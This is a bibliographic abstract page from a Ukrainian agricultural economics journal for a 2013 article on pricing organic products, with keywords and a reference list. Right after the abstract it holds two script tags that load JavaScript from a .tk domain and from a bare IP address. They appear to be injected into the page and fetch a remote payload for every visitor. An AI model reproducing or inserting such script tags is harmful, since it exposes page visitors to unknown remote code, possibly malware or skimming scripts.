ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.516.22:665.9
Ціноутворення та цінова політика

Формування ціни на органічну продукцію / Гуцаленко О. О. // Економіка АПК. - 2013. - № 11 - С. 57

Виділено найгостріші проблеми виробництва органічної продукції, а також проаналізовано останні дослідження з питань маркетингової стратегії та формування й регулювання ціни. Розкрито механізм формування ціни на органічну продукцію, розглянуто чинники ціноутворення та фактори впливу попиту і пропозиції, висвітлено головні цілі ціноутворення. Показана важливість психологічного фактора формування попиту на органічну продукцію. Відображено результати опитування респондентів різного віку й соціального стану щодо попиту на окремі види органічної продукції. Проаналізовано фактори впливу на діяльність підприємства з виробництва органічної продукції, виділено головну цінову стратегію та визначено перелік витрат, що формують досить високу ціну на органічну продукцію. Табл: 1. Рис.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: органічне виробництво, органічна продукція, маркетингова стратегія, ціна, ціно-утворення, попит, екологічно чиста продукція, державна підтримка

Список використаних джерел

 1. Борисова В.А. Економічні проблеми виробництва та споживання екологічно чистої продукції / В. А. Борисова // Економіка АПК. – 2001. – № 10. – С. 8 – 11.
 2. Цены и ценообразование: учеб. для вузов, 4-е изд.; под ред. В.Е. Есипова. – СПб: Издательство «Питер», 2004. – 464 с.
 3. Маслак О. Ринок органіки в Україні: стан та перспективи / О. Маслак // Агробізнес сьогодні. – 2011. – № 24 (223).
 4. Ціни, витрати, прибутки агровиробництва та інфраструктура продовольчих ринків; за ред. О.М. Шпичака. – К.: ІАЕ, 2000. – 586 с.
 5. Zander, Katrin; Stolz, Hanna und Hamm, Ulrich (2013): Promising ethical arguments for product differentiation in the organic food sector. A mixed methods research approach. Appetite, 62, S. 133-142 [Електронний ресурс]. – Режим доступу: http://www.sciencedirect.com/science/article/pii/S0195666312004679.
 6. Weibel, Franco P.; Häseli, Andreas; Schmid, Otto und Willer, Helga (2004): Present Status of Organic Fruit Growing in Europe. In: Bertischinger, L. und Anderson, J.D. (Hrsg.) ISHS Acta Horticulturae 638: XXVI International Horticultural Congress: Sustainability of Horticultural Systems in the 21st Century. International Society for Horticultural Science ISHS, Leuven, Belgium, S. 375-385 [Electronic resource]. – Mode of access: http://www.actahort.org/books/638/638_49.htm.
 7. Reiter, Reinhard (2009) Produktion von Biofischen. In: Wiesinger, Klaus und Cais, Kathrin (Hrsg.) Angewandte Forschung und Beratung für den ökologischen Landbau in Bayern, Öko-Landbau-Tag 2009. , Bayerische Landesanstalt für Landwirtschaft (LfL), Freising-Weihenstephan, Schriftenreihe der Bayerischen Landesanstalt für Landwirtschaft, Nr. 7, S. 17-25. [Electronic resource]. – Mode of access: http://www.lfl.bayern.de/publikationen/daten/schriftenreihe/p_35023.pdf
 8. Балабанова Л.В. Цінова політика торговельного підприємства в умовах маркетингової орієнтації / Л.В. Балабанова, О.В. Сардак. – Донецьк: ДонДует ім. М.І. Туган-Барановського, 2004. – 156 с.
 9. Why is organic food more expensive, and when will it change? [Electronic resource]. – Mode of access: http://www.organicfoodee.com /sense/tooexpensive/
 10. Окландер М.А. Маркетингова цінова політика: навч. посіб. / М.А. Окландер, О.П. Чукурна. – К.: Центр учбової літератури, 2012. – 240 с.
 11. Гаркавенко С.С. Маркетинг: робочий конспект та навчальні тестові завдання / навч. посіб. для студ. вищ. навч. закл. / С.С. Гаркавенко. – К. : Лібра, 2004. – 280 с.
Читати статтю: 13_11_57-60.pdf